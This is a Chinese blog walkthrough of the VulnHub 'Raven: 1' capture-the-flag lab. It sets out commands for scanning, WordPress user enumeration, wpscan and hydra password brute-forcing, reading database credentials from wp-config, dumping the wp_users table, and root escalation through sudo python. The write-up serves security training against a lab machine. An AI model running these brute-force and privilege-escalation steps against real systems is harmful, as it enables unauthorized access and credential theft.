vulnhub靶机raven1

本文详细介绍了一次针对特定IP靶机的渗透测试过程,包括信息搜集、爆破尝试、数据库登录及权限提升等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机下载地址:Raven: 1 ~ VulnHub

Kali ip:192.168.174.128

靶机ip:192.168.174.131

实验思路:靶机ip发现,端口扫描,wordpress用户枚举和爆破,ssh爆破,MySQL登录,python提权

一、信息搜集

靶机ip发现:arp-scan -l

开放端口扫描

nmap -p- -sV -A 192.168.174.131

使用dirsearch脚本进行扫描

python dirsearch.py -u http://192.168.174.131

当然这里可以使用phpmail的漏洞,和raven一样

先修改host文件

sudo nano /etc/hosts

修改host后网站正常显示

二、尝试爆破

这里发现wordpress,尝试使用wpscan查看用户

wpscan --url http://192.168.174.131/wordpress/ -e u  

这里发现两个用户,把两个用户名写入username文本中,wpscan进行爆破

wpscan --url http://192.168.174.131/wordpress/ --usernames /home/ycx/Desktop/username --passwords /usr/share/wordlists/rockyou.txt

破解密码没有成功

尝试使用hydra进行ssh破解

hydra -L /home/ycx/Desktop/username -P /usr/share/wordlists/rockyou.txt ssh://192.168.174.131

这里的username是我把那两个用户的名字放到了文本当中

介绍两个参数:-v 输出详细信息 -f 破解出一个就停止破解

下面尝试ssh进行登录

在网站目录进行查看 发现flag2

和raven2一样的思路

三、数据库登录

这里查看wordpress下的wp-config文件,发现存在数据库的账号密码

define('DB_USER', 'root');

define('DB_PASSWORD', 'R@v3nSecurity');

操作数据库命令:

mysql -uroot -pR@v3nSecurity

show databases;

use wordpress

show tables;

select * from wp_users;

对这两个加密的密码尝试破解

这里切换到steven用户,开启交互式窗口

尝试sudo -l

sudo python -c 'import pty; pty.spawn("/bin/sh")'

python提权

这里成功提权

回过头去找flag1,在view-source:192.168.174.131/service.html可以看到

在post中发现flag3

到这里四个flag全都找到了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值